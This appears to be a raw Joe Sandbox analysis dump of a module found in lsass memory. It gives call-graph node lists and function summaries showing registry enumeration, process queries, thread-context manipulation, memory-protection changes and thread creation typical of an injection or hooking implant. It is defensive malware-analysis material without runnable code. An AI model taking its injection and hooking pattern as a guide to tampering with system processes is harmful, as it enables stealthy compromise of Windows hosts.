2d6f151168e RegOpenKeyExW 7528 2d6f15118a6 7527->7528 7529 2d6f15116c0 RegOpenKeyExW 7527->7529 7528->7506 7530 2d6f15116e9 7529->7530 7531 2d6f15116ff RegOpenKeyExW 7529->7531 7587 2d6f15112bc RegQueryInfoKeyW 7530->7587 7533 2d6f151173a RegOpenKeyExW 7531->7533 7534 2d6f1511723 7531->7534 7537 2d6f151175e 7533->7537 7538 2d6f1511775 RegOpenKeyExW 7533->7538 7596 2d6f151104c RegQueryInfoKeyW 7534->7596 7540 2d6f15112bc 16 API calls 7537->7540 7541 2d6f1511799 7538->7541 7542 2d6f15117b0 RegOpenKeyExW 7538->7542 7545 2d6f151176b RegCloseKey 7540->7545 7546 2d6f15112bc 16 API calls 7541->7546 7543 2d6f15117eb RegOpenKeyExW 7542->7543 7544 2d6f15117d4 7542->7544 7548 2d6f1511826 RegOpenKeyExW 7543->7548 7549 2d6f151180f 7543->7549 7547 2d6f15112bc 16 API calls 7544->7547 7545->7538 7550 2d6f15117a6 RegCloseKey 7546->7550 7551 2d6f15117e1 
RegCloseKey 7547->7551 7553 2d6f151184a 7548->7553 7554 2d6f1511861 RegOpenKeyExW 7548->7554 7552 2d6f151104c 6 API calls 7549->7552 7550->7542 7551->7543 7555 2d6f151181c RegCloseKey 7552->7555 7556 2d6f151104c 6 API calls 7553->7556 7557 2d6f151189c RegCloseKey 7554->7557 7558 2d6f1511885 7554->7558 7555->7548 7559 2d6f1511857 RegCloseKey 7556->7559 7557->7528 7560 2d6f151104c 6 API calls 7558->7560 7559->7554 7561 2d6f1511892 RegCloseKey 7560->7561 7561->7557 7606 2d6f15114a4 7562->7606 7579->7513 7580->7515 7581->7517 7582->7519 7583->7521 7584->7523 7585->7525 7586->7527 7588 2d6f1511327 GetProcessHeap HeapAlloc 7587->7588 7589 2d6f151148a RegCloseKey 7587->7589 7590 2d6f1511476 GetProcessHeap HeapFree 7588->7590 7591 2d6f1511352 RegEnumValueW 7588->7591 7589->7531 7590->7589 7592 2d6f15113a5 7591->7592 7592->7590 7592->7591 7594 2d6f151141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7592->7594 7595 2d6f15113d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7592->7595 7601 2d6f151152c 7592->7601 7594->7592 7595->7594 7597 2d6f15111b5 RegCloseKey 7596->7597 7599 2d6f15110bf 7596->7599 7597->7533 7598 2d6f15110cf RegEnumValueW 7598->7599 7599->7597 7599->7598 7600 2d6f151114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7599->7600 7600->7599 7602 2d6f1511546 7601->7602 7605 2d6f151157c 7601->7605 7603 2d6f151155d StrCmpIW 7602->7603 7604 2d6f1511565 StrCmpW 7602->7604 7602->7605 7603->7602 7604->7602 7605->7592 7607 2d6f15114e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 7606->7607 7608 2d6f15114c1 GetProcessHeap HeapFree 7606->7608 7608->7607 7608->7608 9137 2d6f151decc 9138 2d6f151def1 9137->9138 9147 2d6f151df08 9137->9147 9139 2d6f151dadc __free_lconv_mon 11 API calls 9138->9139 9140 2d6f151def6 9139->9140 9142 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9140->9142 9141 2d6f151dfc0 9191 2d6f151c32c 9141->9191 9144 2d6f151df01 9142->9144 9146 2d6f151e020 9150 2d6f151db74 __free_lconv_mon 11 API calls 9146->9150 9147->9141 9151 2d6f151df55 
9147->9151 9153 2d6f151df98 9147->9153 9169 2d6f151e110 9147->9169 9149 2d6f151e0b1 9154 2d6f151db74 __free_lconv_mon 11 API calls 9149->9154 9152 2d6f151e027 9150->9152 9155 2d6f151df78 9151->9155 9158 2d6f151db74 __free_lconv_mon 11 API calls 9151->9158 9152->9155 9159 2d6f151db74 __free_lconv_mon 11 API calls 9152->9159 9153->9155 9160 2d6f151db74 __free_lconv_mon 11 API calls 9153->9160 9157 2d6f151e0bc 9154->9157 9162 2d6f151db74 __free_lconv_mon 11 API calls 9155->9162 9156 2d6f151e052 9156->9149 9156->9156 9166 2d6f151e0f7 9156->9166 9197 2d6f1521380 9156->9197 9161 2d6f151e0d5 9157->9161 9165 2d6f151db74 __free_lconv_mon 11 API calls 9157->9165 9158->9151 9159->9152 9160->9153 9163 2d6f151db74 __free_lconv_mon 11 API calls 9161->9163 9162->9144 9163->9144 9165->9157 9167 2d6f151d9c0 _invalid_parameter_noinfo 17 API calls 9166->9167 9168 2d6f151e10c 9167->9168 9170 2d6f151e13e 9169->9170 9170->9170 9171 2d6f151dafc __free_lconv_mon 11 API calls 9170->9171 9172 2d6f151e189 9171->9172 9173 2d6f1521380 49 API calls 9172->9173 9174 2d6f151e1bf 9173->9174 9175 2d6f151d9c0 _invalid_parameter_noinfo 17 API calls 9174->9175 9176 2d6f151e293 9175->9176 9177 2d6f151e5e4 23 API calls 9176->9177 9178 2d6f151e376 9177->9178 9206 2d6f151f9d8 9178->9206 9183 2d6f151e43d 9184 2d6f151e5e4 23 API calls 9183->9184 9185 2d6f151e46d 9184->9185 9186 2d6f151f9d8 5 API calls 9185->9186 9187 2d6f151e496 9186->9187 9231 2d6f151dd40 9187->9231 9190 2d6f151e110 59 API calls 9192 2d6f151c344 9191->9192 9196 2d6f151c37c 9191->9196 9193 2d6f151dafc __free_lconv_mon 11 API calls 9192->9193 9192->9196 9194 2d6f151c372 9193->9194 9195 2d6f151db74 __free_lconv_mon 11 API calls 9194->9195 9195->9196 9196->9146 9196->9156 9200 2d6f152139d 9197->9200 9198 2d6f15213a2 9199 2d6f151dadc __free_lconv_mon 11 API calls 9198->9199 9203 2d6f15213b8 9198->9203 9205 2d6f15213ac 9199->9205 9200->9198 9202 2d6f15213ec 9200->9202 9200->9203 9201 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9201->9203 
9202->9203 9204 2d6f151dadc __free_lconv_mon 11 API calls 9202->9204 9203->9156 9204->9205 9205->9201 9207 2d6f151f7c4 5 API calls 9206->9207 9208 2d6f151e3a1 9207->9208 9209 2d6f151dbc4 9208->9209 9210 2d6f151dbee 9209->9210 9211 2d6f151dc12 9209->9211 9215 2d6f151db74 __free_lconv_mon 11 API calls 9210->9215 9219 2d6f151dbfd FindFirstFileExW 9210->9219 9212 2d6f151dc17 9211->9212 9213 2d6f151dc6c 9211->9213 9216 2d6f151dc2c 9212->9216 9212->9219 9220 2d6f151db74 __free_lconv_mon 11 API calls 9212->9220 9214 2d6f151f4ac MultiByteToWideChar 9213->9214 9226 2d6f151dc88 9214->9226 9215->9219 9217 2d6f151ce3c 12 API calls 9216->9217 9217->9219 9218 2d6f151dc8f GetLastError 9253 2d6f151da50 9218->9253 9219->9183 9220->9216 9222 2d6f151dcca 9222->9219 9223 2d6f151f4ac MultiByteToWideChar 9222->9223 9228 2d6f151dd0e 9223->9228 9225 2d6f151dcbd 9227 2d6f151ce3c 12 API calls 9225->9227 9226->9218 9226->9222 9226->9225 9230 2d6f151db74 __free_lconv_mon 11 API calls 9226->9230 9227->9222 9228->9218 9228->9219 9229 2d6f151dadc __free_lconv_mon 11 API calls 9229->9219 9230->9225 9232 2d6f151dd8e 9231->9232 9235 2d6f151dd6a 9231->9235 9233 2d6f151dde8 9232->9233 9234 2d6f151dd94 9232->9234 9236 2d6f151f53c WideCharToMultiByte 9233->9236 9238 2d6f151dda9 9234->9238 9239 2d6f151dd79 9234->9239 9240 2d6f151db74 __free_lconv_mon 11 API calls 9234->9240 9237 2d6f151db74 __free_lconv_mon 11 API calls 9235->9237 9235->9239 9247 2d6f151de0c 9236->9247 9237->9239 9241 2d6f151ce3c 12 API calls 9238->9241 9239->9190 9240->9238 9241->9239 9242 2d6f151de13 GetLastError 9244 2d6f151da50 11 API calls 9242->9244 9243 2d6f151de50 9243->9239 9248 2d6f151f53c WideCharToMultiByte 9243->9248 9245 2d6f151de20 9244->9245 9249 2d6f151dadc __free_lconv_mon 11 API calls 9245->9249 9246 2d6f151de44 9251 2d6f151ce3c 12 API calls 9246->9251 9247->9242 9247->9243 9247->9246 9250 2d6f151db74 __free_lconv_mon 11 API calls 9247->9250 9252 2d6f151de9c 9248->9252 9249->9239 9250->9246 9251->9243 9252->9239 
9252->9242 9254 2d6f151d3d0 __free_lconv_mon 11 API calls 9253->9254 9255 2d6f151da5d __free_lconv_mon 9254->9255 9256 2d6f151d3d0 __free_lconv_mon 11 API calls 9255->9256 9257 2d6f151da7f 9256->9257 9257->9229 8083 2d6f1517f4c 8084 2d6f1517f70 __scrt_release_startup_lock 8083->8084 8085 2d6f151bd15 8084->8085 8086 2d6f151d3d0 __free_lconv_mon 11 API calls 8084->8086 8087 2d6f151bd3e 8086->8087 9258 2d6f1521ed0 9259 2d6f151f0c0 69 API calls 9258->9259 9260 2d6f1521ed9 9259->9260 9261 2d6f15250cf 9262 2d6f15250e7 9261->9262 9268 2d6f1525152 9261->9268 9263 2d6f1519a64 _CreateFrameInfo 9 API calls 9262->9263 9262->9268 9264 2d6f1525134 9263->9264 9265 2d6f1519a64 _CreateFrameInfo 9 API calls 9264->9265 9266 2d6f1525149 9265->9266 9267 2d6f151cad8 23 API calls 9266->9267 9267->9268 8479 2d6f151b7d4 8485 2d6f151b707 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8479->8485 8480 2d6f151b7fb 8481 2d6f1519a64 _CreateFrameInfo 9 API calls 8480->8481 8482 2d6f151b800 8481->8482 8483 2d6f1519a64 _CreateFrameInfo 9 API calls 8482->8483 8484 2d6f151b80b __FrameHandler3::GetHandlerSearchState 8482->8484 8483->8484 8485->8480 8485->8484 8486 2d6f151a114 9 API calls Is_bad_exception_allowed 8485->8486 8487 2d6f151a13c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8485->8487 8486->8485 8487->8485 9269 2d6f15160d3 9270 2d6f15160e0 9269->9270 9271 2d6f15160ec GetThreadContext 9270->9271 9272 2d6f151624a 9270->9272 9271->9272 9273 2d6f1516112 9271->9273 9275 2d6f151632e 9272->9275 9276 2d6f1516271 VirtualProtect FlushInstructionCache 9272->9276 9273->9272 9278 2d6f1516139 9273->9278 9274 2d6f15161bd 9277 2d6f151634e 9275->9277 9280 2d6f1514810 VirtualFree 9275->9280 9276->9272 9279 2d6f1515220 3 API calls 9277->9279 9278->9274 9281 2d6f1516196 SetThreadContext 9278->9281 9284 2d6f1516353 9279->9284 9280->9277 9281->9274 9282 2d6f15163a7 9285 2d6f1517d70 _log10_special 8 API calls 9282->9285 9283 2d6f1516367 ResumeThread 9283->9284 9284->9282 9284->9283 9286 
2d6f15163ef 9285->9286 9287 2d6f15218d3 9288 2d6f15218e0 9287->9288 9289 2d6f15218f5 9288->9289 9290 2d6f152190e 9288->9290 9291 2d6f151dadc __free_lconv_mon 11 API calls 9289->9291 9293 2d6f151e5e4 23 API calls 9290->9293 9295 2d6f1521905 9290->9295 9292 2d6f15218fa 9291->9292 9294 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9292->9294 9293->9295 9294->9295 8488 2d6f15207b8 8489 2d6f15207c3 8488->8489 8497 2d6f15230b8 8489->8497 8510 2d6f151cdcc EnterCriticalSection 8497->8510 8511 2d6f151c9bc 8512 2d6f151c9ed 8511->8512 8513 2d6f151c9d5 8511->8513 8513->8512 8514 2d6f151db74 __free_lconv_mon 11 API calls 8513->8514 8514->8512 9296 2d6f151febc 9297 2d6f151fec8 9296->9297 9299 2d6f151feef 9297->9299 9300 2d6f15220ec 9297->9300 9301 2d6f15220f1 9300->9301 9305 2d6f152212c 9300->9305 9302 2d6f1522124 9301->9302 9303 2d6f1522112 DeleteCriticalSection 9301->9303 9304 2d6f151db74 __free_lconv_mon 11 API calls 9302->9304 9303->9302 9303->9303 9304->9305 9305->9297 9306 2d6f15130bc 9307 2d6f15130ec 9306->9307 9308 2d6f15131a5 9307->9308 9309 2d6f1513109 PdhGetCounterInfoW 9307->9309 9309->9308 9310 2d6f1513127 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9309->9310 9311 2d6f1513159 StrCmpW 9310->9311 9312 2d6f1513191 GetProcessHeap HeapFree 9310->9312 9311->9312 9314 2d6f151316e 9311->9314 9312->9308 9313 2d6f1513554 12 API calls 9313->9314 9314->9312 9314->9313 9315 2d6f1515cbc 9316 2d6f1515cc3 9315->9316 9317 2d6f1515cf0 VirtualProtect 9316->9317 9319 2d6f1515c00 9316->9319 9318 2d6f1515d19 GetLastError 9317->9318 9317->9319 9318->9319 8088 2d6f151b53e 8089 2d6f1519a64 _CreateFrameInfo 9 API calls 8088->8089 8091 2d6f151b54b __CxxCallCatchBlock 8089->8091 8090 2d6f151b58f RaiseException 8092 2d6f151b5b6 8090->8092 8091->8090 8101 2d6f151a0c0 8092->8101 8094 2d6f151b5e7 __CxxCallCatchBlock 8095 2d6f1519a64 _CreateFrameInfo 9 API calls 8094->8095 8096 2d6f151b5fa 8095->8096 8097 2d6f1519a64 _CreateFrameInfo 9 API calls 8096->8097 8100 2d6f151b603 8097->8100 8102 
2d6f1519a64 _CreateFrameInfo 9 API calls 8101->8102 8103 2d6f151a0d2 8102->8103 8104 2d6f1519a64 _CreateFrameInfo 9 API calls 8103->8104 8106 2d6f151a10d 8103->8106 8105 2d6f151a0dd 8104->8105 8105->8106 8107 2d6f1519a64 _CreateFrameInfo 9 API calls 8105->8107 8108 2d6f151a0fe 8107->8108 8108->8094 8109 2d6f1519750 8108->8109 8110 2d6f1519a64 _CreateFrameInfo 9 API calls 8109->8110 8111 2d6f151975e 8110->8111 8111->8094 9320 2d6f1517ec0 9321 2d6f1517ec9 __scrt_release_startup_lock 9320->9321 9323 2d6f1517ecd 9321->9323 9324 2d6f151c38c 9321->9324 9325 2d6f151c3ac 9324->9325 9326 2d6f151c3c3 9324->9326 9327 2d6f151c3ca 9325->9327 9328 2d6f151c3b4 9325->9328 9326->9323 9329 2d6f151f0c0 69 API calls 9327->9329 9330 2d6f151dadc __free_lconv_mon 11 API calls 9328->9330 9331 2d6f151c3cf 9329->9331 9332 2d6f151c3b9 9330->9332 9355 2d6f151e7a4 GetModuleFileNameW 9331->9355 9334 2d6f151d9a0 _invalid_parameter_noinfo 49 API calls 9332->9334 9334->9326 9338 2d6f151c32c 11 API calls 9339 2d6f151c439 9338->9339 9340 2d6f151c459 9339->9340 9341 2d6f151c441 9339->9341 9342 2d6f151c164 23 API calls 9340->9342 9343 2d6f151dadc __free_lconv_mon 11 API calls 9341->9343 9348 2d6f151c475 9342->9348 9344 2d6f151c446 9343->9344 9345 2d6f151db74 __free_lconv_mon 11 API calls 9344->9345 9345->9326 9346 2d6f151c47b 9347 2d6f151db74 __free_lconv_mon 11 API calls 9346->9347 9347->9326 9348->9346 9349 2d6f151c4a7 9348->9349 9350 2d6f151c4c0 9348->9350 9351 2d6f151db74 __free_lconv_mon 11 API calls 9349->9351 9352 2d6f151db74 __free_lconv_mon 11 API calls 9350->9352 9353 2d6f151c4b0 9351->9353 9352->9346 9354 2d6f151db74 __free_lconv_mon 11 API calls 9353->9354 9354->9326 9356 2d6f151e7e9 GetLastError 9355->9356 9357 2d6f151e7fd 9355->9357 9359 2d6f151da50 11 API calls 9356->9359 9358 2d6f151e5e4 23 API calls 9357->9358 9360 2d6f151e82b 9358->9360 9361 2d6f151e7f6 9359->9361 9363 2d6f151f9d8 5 API calls 9360->9363 9366 2d6f151e83c 9360->9366 9362 2d6f1517d70 _log10_special 8 API calls 
9361->9362 9364 2d6f151c3e6 9362->9364 9363->9366 9367 2d6f151c164 9364->9367 9373 2d6f151e688 9366->9373 9369 2d6f151c1a2 9367->9369 9371 2d6f151c20e 9369->9371 9387 2d6f151f470 9369->9387 9370 2d6f151c2ff 9370->9338 9371->9370 9372 2d6f151f470 23 API calls 9371->9372 9372->9371 9374 2d6f151e6c7 9373->9374 9377 2d6f151e6ac 9373->9377 9375 2d6f151e6cc 9374->9375 9376 2d6f151f53c WideCharToMultiByte 9374->9376 9375->9377 9380 2d6f151dadc __free_lconv_mon 11 API calls 9375->9380 9379 2d6f151e723 9376->9379 9377->9361 9378 2d6f151e72a GetLastError 9381 2d6f151da50 11 API calls 9378->9381 9379->9375 9379->9378 9382 2d6f151e755 9379->9382 9380->9377 9383 2d6f151e737 9381->9383 9384 2d6f151f53c WideCharToMultiByte 9382->9384 9385 2d6f151dadc __free_lconv_mon 11 API calls 9383->9385 9386 2d6f151e77c 9384->9386 9385->9377 9386->9377 9386->9378 9388 2d6f151f3fc 9387->9388 9389 2d6f151e5e4 23 API calls 9388->9389 9390 2d6f151f420 9389->9390 9390->9369 8781 2d6f151b444 8782 2d6f1519a64 _CreateFrameInfo 9 API calls 8781->8782 8783 2d6f151b479 8782->8783 8784 2d6f1519a64 _CreateFrameInfo 9 API calls 8783->8784 8785 2d6f151b487 __except_validate_context_record 8784->8785 8786 2d6f1519a64 _CreateFrameInfo 9 API calls 8785->8786 8787 2d6f151b4cb 8786->8787 8788 2d6f1519a64 _CreateFrameInfo 9 API calls 8787->8788 8789 2d6f151b4d4 8788->8789 8790 2d6f1519a64 _CreateFrameInfo 9 API calls 8789->8790 8791 2d6f151b4dd 8790->8791 8804 2d6f151a084 8791->8804 8794 2d6f1519a64 _CreateFrameInfo 9 API calls 8795 2d6f151b50d __CxxCallCatchBlock 8794->8795 8796 2d6f151a0c0 __CxxCallCatchBlock 9 API calls 8795->8796 8801 2d6f151b5be 8796->8801 8797 2d6f151b5e7 __CxxCallCatchBlock 8798 2d6f1519a64 _CreateFrameInfo 9 API calls 8797->8798 8799 2d6f151b5fa 8798->8799 8800 2d6f1519a64 _CreateFrameInfo 9 API calls 8799->8800 8803 2d6f151b603 8800->8803 8801->8797 8802 2d6f1519750 __CxxCallCatchBlock 9 API calls 8801->8802 8802->8797 8805 2d6f1519a64 _CreateFrameInfo 9 API calls 8804->8805 8806 
2d6f151a095 8805->8806 8807 2d6f1519a64 _CreateFrameInfo 9 API calls 8806->8807 8808 2d6f151a0a0 8806->8808 8807->8808 8809 2d6f1519a64 _CreateFrameInfo 9 API calls 8808->8809 8810 2d6f151a0b1 8809->8810 8810->8794 8810->8795 9391 2d6f15128c4 9393 2d6f151290a 9391->9393 9392 2d6f1512970 9393->9392 9394 2d6f1513c74 StrCmpNIW 9393->9394 9394->9393

                                                          Control-flow Graph
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryQueryType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 4175507832-91387939
                                                          • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction ID: a7a2f4b86567ddabb2164e3d737f1ab75e8ae98fca2c710c464a591d530f4088
                                                          • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction Fuzzy Hash: 777180A6204F814AEB669F26B85C3AA6790F7857C4F64001BED0F67F99DE38CE05C740

                                                          Control-flow Graph

                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL ref: 000002D6F1512147
                                                          • StrCmpNIW.SHLWAPI ref: 000002D6F15121B6
                                                            • Part of subcall function 000002D6F15131CC: GetProcessHeap.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F15131EF
                                                            • Part of subcall function 000002D6F15131CC: HeapAlloc.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F1513202
                                                            • Part of subcall function 000002D6F15131CC: StrCmpNIW.SHLWAPI(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F1513277
                                                            • Part of subcall function 000002D6F15131CC: GetProcessHeap.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F15132DD
                                                            • Part of subcall function 000002D6F15131CC: HeapFree.KERNEL32(?,?,?,?,?,000002D6F15122ED), ref: 000002D6F15132EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                          • String ID: S$dialer
                                                          • API String ID: 722747020-3873981283
                                                          • Opcode ID: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                          • Instruction ID: b1aa162197449f89dcd7425857e4e44c2aeade2372b5389528f94c864bfbd257
                                                          • Opcode Fuzzy Hash: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                          • Instruction Fuzzy Hash: F1517DB2B10E248AEB62CF26A84C6AD63A5F7047D4F25841ADE5E63F48DB38CC51C740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: d8c3b55f1581f15655857fc0674f79bf9864d6f485298729ae04c5ad62850c3b
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: E3F03CA3304AC19AEB208F21F5DC7596760F754BD8F884022DA4E46D54DEBCDE88CB00

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002D6F1513639
                                                          • PathFindFileNameW.SHLWAPI ref: 000002D6F1513648
                                                            • Part of subcall function 000002D6F1513C74: StrCmpNIW.KERNELBASE(?,?,?,000002D6F151254B), ref: 000002D6F1513C8C
                                                            • Part of subcall function 000002D6F1513BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513BCE
                                                            • Part of subcall function 000002D6F1513BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513BFC
                                                            • Part of subcall function 000002D6F1513BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513C1E
                                                            • Part of subcall function 000002D6F1513BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513C39
                                                            • Part of subcall function 000002D6F1513BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002D6F151365F), ref: 000002D6F1513C5A
                                                          • CreateThread.KERNELBASE ref: 000002D6F151368F
                                                            • Part of subcall function 000002D6F1511D40: GetCurrentThread.KERNEL32 ref: 000002D6F1511D4B
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: 73d54663c895a4f2150cf828e964c136c77ad552aa7f349c4b341c67237fb721
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: 0C1152F1610E418DFBA2AF20B46D3592691B7543E5F504927990F91E95EF7CCC098A00

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dialer
                                                          • API String ID: 0-3528709123
                                                          • Opcode ID: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                          • Instruction ID: 33ea1c5c4b75a750e3aa84d3109a535aad3ef99273fbd9bc3119f1c8eacba178
                                                          • Opcode Fuzzy Hash: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                          • Instruction Fuzzy Hash: D0D0A7E2311E868EFF65DFA2E8DC6A02350EF14798F884022CD0A02910E71D8D8D8710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: d1ad120bac2b9df70661f136652211b2a5dd1fa2e4f7da9c8a8aa6ee51d77075
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: 7491E372B01A608BEB64CF19E04CF697391F794BE4F58812A9F4B17B88DA39DD12C740

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002D6F1511628: GetProcessHeap.KERNEL32 ref: 000002D6F1511633
                                                            • Part of subcall function 000002D6F1511628: HeapAlloc.KERNEL32 ref: 000002D6F1511642
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116B2
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116DF
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15116F9
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511719
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511734
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511754
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151176F
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151178F
